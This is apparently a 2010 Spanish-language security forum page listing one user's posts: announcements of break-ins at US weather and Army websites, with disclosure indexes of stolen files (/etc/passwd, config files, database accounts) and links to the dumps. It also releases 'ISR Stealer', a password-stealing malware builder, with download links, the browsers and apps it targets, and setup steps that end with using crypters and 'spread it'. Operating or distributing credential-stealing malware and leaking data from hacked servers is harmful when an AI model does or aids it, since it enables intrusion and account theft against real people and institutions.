últimos mensajes de: TinKode

Mostrar Mensajes
Páginas: 1 [2] 3

Seguridad Informática / Nivel Web / National Weather Service (water.weather.gov) Full Disclosure

en: 31 Octubre 2010, 22:09 pm

Código:

==[ Author  : TinKode
==[ WebSite : InSecurity.Ro
==[ Date    : 31.10.2010
==[ Hour    : 13:37 PM
==[ Target  : www.water.weather.gov
==[ Document: weather.gov_disclosure.txt
==[ Method  : unkn0wn.priv

 ------------------------------------------------
|	[0] (About)				 |
|	[1] /etc/passwd				 |
|	[2] /etc/httpd/conf/httpd.conf		 |
|	[3] /etc/hosts				 |
|	[4] /etc/fstab 				 |
|	[5] index.php				 |
|	[6] config.php				 |
|	[7] databases_access_accounts (all)	 |
 ------------------------------------------------

Mirror: TinKode 27 – Security Blog Blog Archive National Weather Service (water.weather.gov) Full Disclosure

12	Seguridad Informática / Nivel Web / Re: USArmy Civil Affairs&Psychological Operations Command (usacapoc.army.mil) Hacked	en: 31 Octubre 2010, 20:19 pm
Cita de: WHK en 31 Octubre 2010, 20:18 pm thanks, use bug in webserver or script in army.mil? Both!

13	Seguridad Informática / Nivel Web / USArmy Civil Affairs&Psychological Operations Command (usacapoc.army.mil) Hacked	en: 31 Octubre 2010, 20:15 pm
Código: ==[ Author : TinKode ==[ WebSite : InSecurity.Ro ==[ Date : 31.10.2010 ==[ Hour : 10:44 PM ==[ Target : www.usacapoc.army.mil ==[ Document: US_Army_Disclosure(2).txt ==[ Method : unkn0wn.priv ==[ Hacked : http://pastebin.com/raw.php?i=sA8n79th Link to article: http://tinkode27.baywords.com/u-s-army-civil-affairs-psychological-operations-command-website-hacked/

14	Seguridad Informática / Nivel Web / US Army 470th MI Brigade (www.470mi.inscom.army.mil) - Full Disclosure	en: 31 Octubre 2010, 20:12 pm
Código: ==[ Author : TinKode ==[ WebSite : InSecurity.Ro ==[ Date : 30.10.2010 ==[ Hour : 23.52 PM ==[ Target : www.470mi.inscom.army.mil ==[ Document: US_Army_Disclosure(1).txt ==[ Method : unkn0wn.priv ==[ Hacked : http://pastebin.com/raw.php?i=bqd3PkJG Link to article: http://tinkode27.baywords.com/us-army-470th-mi-brigade-website-hacked-full-disclosure/

15	Seguridad Informática / Nivel Web / Re: ISR Stealer v 0.2	en: 19 Julio 2010, 11:47 am
Cita de: Debci en 18 Julio 2010, 22:41 pm Im trying it but does not work I tested with test php and it work but doesnt catch any password Cheers. Maybe you have the option ON to don't save the passwd on your browser.

16	Seguridad Informática / Nivel Web / Re: ISR Stealer v 0.2	en: 18 Julio 2010, 02:48 am
Cita de: SOMBRIO en 18 Julio 2010, 00:27 am I am a stupid guy Me equivoque y ejecute el servidor sin querer. la pagina que trae por default no trae cargado los archivos o si? Respondanme rapido para empezar a cambiar las contraseñas. Your accounts are sented to the FTP account what you added when you created the server, not to others. Don't worry!

17	Seguridad Informática / Nivel Web / ISR Stealer v 0.2	en: 17 Julio 2010, 01:13 am
//Romanian: Acesta al 2-lea release al ISR Stealer, vor urma noi updateuri. Va asteptam cu propuneri pentru a face aceasta aplicatie mai complexa. //English: This is #2 release of ISR Stealer, there will be new updates. We wait your request list, for make this application more advanced. Current Options: +Send logs to my sql data base(php) +Bind one file(any extension) +Change server icon +Pack server with upx +Steal options: Internet Explorer 4/5/6/7/8 Mozilla Firefox 3.x.x Google Chrome Opera 8/9/10 Yahoo Messenger 8/9/10 Password Yahoo ETS Msn Messenger Pidgin Windows Cd key Filezilla No-ip DynDns Download: Código: http://www.multiupload.com/RJ0N4M6T48 Password: Código: www.insecurity.ro

18	Seguridad Informática / Nivel Web / Re: ISR Stealer 0.1	en: 15 Julio 2010, 09:50 am
Cita de: Debci en 14 Julio 2010, 23:36 pm Alguien me dice que hace exactamente con una cd key de windows? No me coincide con el concepto de stealer que tengo xD Saludos Steal the CD-KEY of Win. Citar a mi tampoco este idioma no lo entiendo que es? TinKode. LOL, just read: //Romanian: Acesta este primul release al ISR Stealer, vor urma noi updateuri. Va asteptam cu propuneri pentru a face aceasta aplicatie mai complexa. //English: This is the first release of ISR Stealer, there will be new updates. We wait your request list, for make this application more advanced. Citar Vale si, ya entiendo estaba espeso xD Pero que tipo de archivo PHP hay que indicarle? Porque normalmente los stealers van con mail, asi que no se.. Yeah exist 2 methods: Mails & Hosts This version it's only with host, because if you steal 50k logs, i don't know if your email can receive so many. Just create a free hosting account, put the files up, run install.php, follow the steps, and after put your link to your "website" in app. create the server (isn't FUD - for that exist so many crypters), and spread it. That's all!

19	Seguridad Informática / Nivel Web / ISR Stealer 0.1	en: 14 Julio 2010, 16:01 pm
//Romanian: Acesta este primul release al ISR Stealer, vor urma noi updateuri. Va asteptam cu propuneri pentru a face aceasta aplicatie mai complexa. //English: This is the first release of ISR Stealer, there will be new updates. We wait your request list, for make this application more advanced. Current Options: +Send logs to my sql data base(php) +Bind one file(any extension) +Change server icon +Pack server with upx +Steal options: Internet Explorer 4/5/6/7/8 Mozilla Firefox 3.x.x Google Chrome Yahoo Messenger 8/9/10 Password Yahoo ETS Msn Messenger Pidgin Windows Cd key Filezilla No-ip DynDns Download: Código: http://www.multiupload.com/4NHDL3Y5EV Password: Código: www.insecurity.ro

20	Seguridad Informática / Nivel Web / Re: Youtube.com Vulnerable to HTML Code Injection	en: 5 Julio 2010, 10:41 am
Cita de: sirdarckcat en 5 Julio 2010, 05:15 am Tinkode, thanks for finding this vulnerability. Next time please send an email to security@google.com so Google can track it and fix it faster. Ok, I don't know if will exist a next time. And official about the author, etc here: http://news.softpedia.com/news/Dangerous-XSS-Bug-Found-on-YouTube-146157.shtml & http://www.xssed.com/news/113/YouTube_persistent_XSS_vulnerability/

Páginas: 1 [2] 3